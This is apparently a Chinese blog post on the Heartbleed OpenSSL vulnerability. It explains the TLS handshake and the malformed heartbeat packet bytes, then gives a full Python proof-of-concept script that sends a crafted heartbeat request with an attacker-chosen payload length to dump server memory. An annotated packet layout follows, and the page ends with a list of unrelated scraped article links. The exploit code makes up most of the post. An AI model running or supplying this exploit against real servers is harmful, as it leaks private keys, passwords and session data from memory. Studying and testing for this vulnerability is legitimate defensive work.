一、漏洞原理:

首先声明,我虽然能看懂C和C++的每一行代码,但是他们连在一起我就不知道什么鬼东西了。所以关于代码说理的部分只能参考其他大牛的博客了。

 /*

 据说源码中有下面两条语句,反正我也没看过源码。

 */

 buffer = OPENSSL_malloc( +  + payload + padding);

 bp = buffer;

还是据说payload这个部分其实是length的值,以上如果都是对的话(事实上以上就是对的),那么在申请内存时候压根就没有检查大小好吗?这不就可以把后面的内存内容包含进来了嘛。

还是说回正题:

TLS/SSL协议简介:

过程:

1-》客户端发送包1:ClientHello

2《-服务器返回包1-2:ServerHello + [Certificate*、ServerKeyExchange*、CertificateRequest*]   => ServerHelloDown

3-》客户端发送包2:[Certificate*、ClientKeyExchange*、CertificateVerify*、ChangeCipherSpec] =》Finished

4《-服务器返回包3:[ChangeCipherSpec] => Finished

5《--》双方交流数据

典型的v1.2正常场景

这是典型的攻击场景抓包v1.1漏洞版本

由此可见:在v1.1版本中进行在收到serverhello数据包之后发送精心构造的heartbeat包进行攻击

正常心跳包

攻击心跳包:

关键字节

修改这个地方,就以为这修改length。返回包heartbeat Response长度就会不一致。

也就是泄露了内存。

18-》content-type:heartbeat(24)

03 02 -》version

03-》Length

01 -》request

60 00 就是payload了 ,你要读取的长度(一般应该是20 00)

所以poc就可以如下:

 #!/usr/bin/env python

 # -*- coding: utf-8 -*-

 import sys

 import time

 import chardet

 import struct

 import socket

 import select

 def String_To_Binary(content):

     return content.replace(' ','').replace('\n','').decode('hex')

 '''

 报文结构参考:http://blog.csdn.net/qq_32400847/article/details/58332946

 '''

 HelloPacket = '''\

 16030200dc010000 d803025343 5b 909d9b 72 0b bc  0c bc 2b 92 a8 48 97 cf bd39 04 \

 cc 16 0a 85 03  90 9f 77 04 33 d4de000066c014c00ac022c0210039003800880087c00fc00\

 500350084c012c008c01cc01b00160013c00dc003000ac013c009c01fc01e00330032009a0099004\

 50044c00ec004002f00960041c011c007c00cc002000500040015001200090014001100080006000\

 300ff01000049000b000403000102000a00340032000e000d0019000b000c00180009000a0016001\

 7000800060007001400150004000500120013000100020003000f001000110023 00 00000f 00 0\

 1 01\

 '''    

 def HexDump(s):

     for b in xrange(0, len(s), 16):

         lin = [c for c in s[b: b + 16]]

         hxdat = ' '.join('%02X' % ord(c) for c in lin)

         pdat = ''.join((c if 32 <= ord(c) <= 126 else '.') for c in lin)

         print ' %04x: %-48s %s' % (b, hxdat, pdat)

     print

 def RecvAll(socketobj, length, timeout=5):

     endtime = time.time() + timeout

     rdata = ''

     remain = length

     while remain > 0:

         rtime = endtime - time.time()

         if rtime < 0:

             return None

         read, wait, error = select.select([socketobj], [], [], 5)

         print 'read: ', read

         if socketobj in read:

             data = socketobj.recv(remain)

             if not data:

                 return None

             rdata += data

             remain -= len(data)

     HexDump(rdata)

     return rdata

 def RecvMsg(socketobj):

     hdr = RecvAll(socketobj, 5)

     if hdr is None:

         return None, None, None

     type, version, length = struct.unpack('>BHH', hdr)

     payload = RecvAll(socketobj, length, 10)

     if payload is None:

         return None, None, None

     return type, version, payload

 def Hit_Hb(socketobj, target):

 # global target

     socketobj.send(String_To_Binary(KeyPacket))

     while True:

         print "[+] receive data..."

         type, version, payload = RecvMsg(socketobj)

         if type is None:

             print "[-] %s |NOTVULNERABLE" % target

             return False

         # TLSv1.1 Record Layer: EncryptedHeartbeat

         # Content Type: Heartbeat (24)

         # Version: TLS 1.1 (0x0302)

         # Length: 19

         # Encrypted Heartbeat Message

         if type == 24:

             if len(payload) > 3:

                 print "[*] %s |VULNERABLE" % target

             else:

                 print "[-] %s |NOTVULNERABLE" % target

             return True

         if type == 21:

             print "[-] %s |NOTVULNERABLE" % target

             return False

 def Do_openSSL_Test(target, port):

     socketobj = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

     socketobj.connect((target, port))

     socketobj.send(String_To_Binary(HelloPacket))

     while True:

         type, version, payload = RecvMsg(socketobj)

         if type == None:

             return

         if type == 22 and ord(payload[0]) == 0x0E:

             break

     # sys.stdout.flush()

     print "[+] send payload: %s" % KeyPacket

     socketobj.send(String_To_Binary(KeyPacket))  # Malformed Packet

     return Hit_Hb(socketobj, target)  # ------------- *********

 if __name__ == '__main__':

     ip = sys.argv[1]

     port = sys.argv[2]

     size = sys.argv[3]

     KeyPacket = "180302000301%s000"%size

     HelloPacket = str(HelloPacket).replace("","").replace("\n","")

     KeyPacket = KeyPacket.replace("","").replace("\n","")

     Do_openSSL_Test(ip,int(port))

报文结构部分如下参考http://blog.csdn.net/qq_32400847/article/details/58332946(特此鸣谢)

 """

 HelloPacket = [

     # TLSv1.1 Record Layer : HandshakeProtocol: Client Hello

     "16"  # Content Type: Handshake (22)

     "0302"  # Version: TLS 1.1 (0x0302)

     "00dc"  # Length: 220

     # Handshake Protocol: Client Hello

     "01"  # Handshake Type: Client Hello (1)

     "0000 d8"  # Length (216)

     "0302"  # Version: TLS 1.1 (0x0302)

     # Random

     "5343 5b 90"  # gmt_unix_time

     "9d9b 72 0b bc  0c bc 2b 92 a8 48 97 cf bd39 04 cc 16 0a 85 03  90 9f 77 04 33 d4de"  # random_bytes

     "00"  # Session ID Length: 0

     "0066"  # Cipher Suite Length: 102

     # Cipher Suites

     "c014"

     "c00a"

     "c022"

     "c021"

     "0039"

     "0038"

     "0088"

     "0087"

     "c00f"

     "c005"

     "0035"

     "0084"

     "c012"

     "c008"

     "c01c"

     "c01b"

     "0016"

     "0013"

     "c00d"

     "c003"

     "000a"

     "c013"

     "c009"

     "c01f"

     "c01e"

     "0033"

     "0032"

     "009a"

     "0099"

     "0045"

     "0044"

     "c00e"

     "c004"

     "002f"

     "0096"

     "0041"

     "c011"

     "c007"

     "c00c"

     "c002"

     "0005"

     "0004"

     "0015"

     "0012"

     "0009"

     "0014"

     "0011"

     "0008"

     "0006"

     "0003"

     "00ff"

     "01"  # Compression Methods

     # Compression Methods (1 method)

     "00"  # Compression Method: null

     "0049"  # Extension Length: 73

     "000b"  # Type: ec_point_formats

     "0004"  # Length: 4

     "03"  # EC point formats length: 3

     # Elliptic curves point formats

     "00"  # EC point format: uncompressed (0)

     "01"  # EC point format:ansix962_compressed_prime

     "02"  # EC point format:ansix962_compressed_char2

     # Extension: elliptic_curves

     "000a"

     "0034"

     "0032"

     "000e"

     "000d"

     "0019"

     "000b"

     "000c"

     "0018"

     "0009"

     "000a"

     "0016"

     "0017"

     "0008"

     "0006"

     "0007"

     "0014"

     "0015"

     "0004"

     "0005"

     "0012"

     "0013"

     "0001"

     "0002"

     "0003"

     "000f"

     "0010"

     "0011"

     "0023 00 00"  # Extension:SeesionTicket TLS

     "000f 00 01 01"  # Extension:Heartbeat

 ]

 # ---------TLSv1---[Heartbeat Request]------------

 KeyPacket = [

             # TLSv1.1 Record Layer: HeartbeatRequest

     "18"    # Content Type: Heartbeat (24) ----(0x18)

     "0302"  # Version: TLS 1.1 (0x0302)

     "0003"  # Heartbeat Message:

     "01"    # Type: Request (1) (0x01)

     "2000"  # Payload Length: (16384) (0x4000)

 ]

 """

心脏滴血HeartBleed漏洞研究及其POC的更多相关文章

  1. heartbleed漏洞利用

    1.  heartbleed漏洞扫描: 2.  heartbleed漏洞利用: poc.py      117.52.93.111 貌似没有打到管理员账号密码,可能是管理员没登录,其实,可以写一个自动 ...

  2. OpenSSL Heartbleed “心脏滴血”漏洞简单攻击示例

    OpenSSL Heartbleed漏洞的公开和流行让许多人兴奋了一把,也让另一些人惊慌了一把. 单纯从攻击的角度讲,我已知道的,网上公开的扫描工具有: 1.  Nmap脚本ssl-heartblee ...

  3. OpenSSL Heartbleed "心脏滴血"漏洞简单攻击示例

    转自:http://www.lijiejie.com/openssl-heartbleed-attack/ OpenSSL Heartbleed漏洞的公开和流行让许多人兴奋了一把,也让另一些人惊慌了一 ...

  4. OpenSSL重大漏洞-Heartbleed之漏洞利用脚本POC讲解

    OpenSSL Security Advisory [07 Apr 2014] ======================================== TLS heartbeat read ...

  5. 心脏滴血漏洞复现(CVE-2014-0160)

    心脏滴血漏洞简述 2014年4月7日,OpenSSL发布安全公告,在OpenSSL1.0.1版本至OpenSSL1.0.1f Beta1版本中存在漏洞,该漏洞中文名称为心脏滴血,英文名称为HeartB ...

  6. OpenSSL “心脏滴血”漏洞

    OpenSSL "心脏滴血"漏洞 漏洞描述 : OpenSSL软件存在"心脏出血"漏洞,该漏洞使攻击者能够从内存中读取多达64 KB的数据,造成信息泄露. 漏洞 ...

  7. 心脏滴血漏洞复现(CVE-2014-0160)

    漏洞范围: OpenSSL 1.0.1版本 漏洞成因: Heartbleed漏洞是由于未能在memcpy()调用受害用户输入内容作为长度参数之前正确进 行边界检查.攻击者可以追踪OpenSSL所分配的 ...

  8. 心脏滴血(CVE-2014-0160)检测与防御

    用Nmap检测 nmap -sV --script=ssl-heartbleed [your ip] -p 443 有心脏滴血漏洞的报告: ➜ ~ nmap -sV --script=ssl-hear ...

  9. 这次OpenSSL HeartBleed漏洞是怎么一回事呢?

    “心脏出血”(Heartbleed)被称为互联网史上最严重的安全漏洞之一,波及了大量常用网站.服务,包括很多人每天都在用的 Gmail 等等,可能导致用户的密码.信用卡轻易泄露.但是我们可能对它还不是 ...

随机推荐

  1. 文件服务器和web应用分离的思路(转)

    目前在做一个应用,有不同的客户端,包括web应用的客户端,其他的客户端,都要访问我的文件服务器,通过文件服务程序提供的服务来访问文件,但是对文件管理服务器这个应用,没有什么思路,请大家给点思路,谢谢: ...

  2. Codeforces 558C Amr and Chemistry 暴力 - -

    点击打开链接 Amr and Chemistry time limit per test 1 second memory limit per test 256 megabytes input stan ...

  3. 彻底解决java WEB项目的文件路径问题(war包)

    在j2EE项目中,我们通常会把项目打包公布,通常是war包,作为独立单元,能够远程上传,载入,公布,还能够实现版本号控制,但这与我们开发过程中使用MyEclipse自己主动部署有所不同,下面做具体说明 ...

  4. easui Pagination Layout

    分页显示方式有几种 layout: ['first', 'prev', 'next', 'last'] layout: ['list', 'sep', 'first', 'prev', 'sep', ...

  5. C#基础概念二十五问

    1.静态成员和非静态成员的区别? 答: 静态变量使用 static 修饰符进行声明,在类被实例化时创建,通过类进行访问 不带有 static 修饰符声明的变量称做非静态变量,在对象被实例化时创建,通过 ...

  6. 《FPGA全程进阶---实战演练》第三章之PCB设计之去耦电容

    1.关于去耦电容为何需要就近摆放? 大多数资料有提到过,去耦电容就近放置,是从减小回路电感的角度去谈及摆放问题,其实还有一个原则就是去耦半径的问题,如果电容离着芯片位置较远,超过去耦半径,会起不到去耦 ...

  7. 用 #include “filename.h” 格式来引用非标准库的头文件

    用 #include “filename.h” 格式来引用非标准库的头文件(编译器将 从用户的工作目录开始搜索) #include <iostream> /* run this progr ...

  8. 一、Open CV3.0.0 与 VS2012配置

    原创:博乐Bar,转载请注明出处. 第一步,准备软件及开发环境 1.OpenCV 3.0.0 下载地址:http://www.opencv.org.cn/index.php/Download ,下载最 ...

  9. 【Java面试题】43 说出一些常用的类,包,接口,请各举5个

    要让人家感觉你对java ee开发很熟,所以,不能仅仅只列core java中的那些东西,要多列你在做ssh项目中涉及的那些东西.就写你最近写的那些程序中涉及的那些类. 常用的类:BufferedRe ...

  10. php date strtotime的用法

    1.上个月第一天及最后一天. echo date('Y-m-01', strtotime('-1 month')); echo strtotime(date('Y-m-01 0:00:00', str ...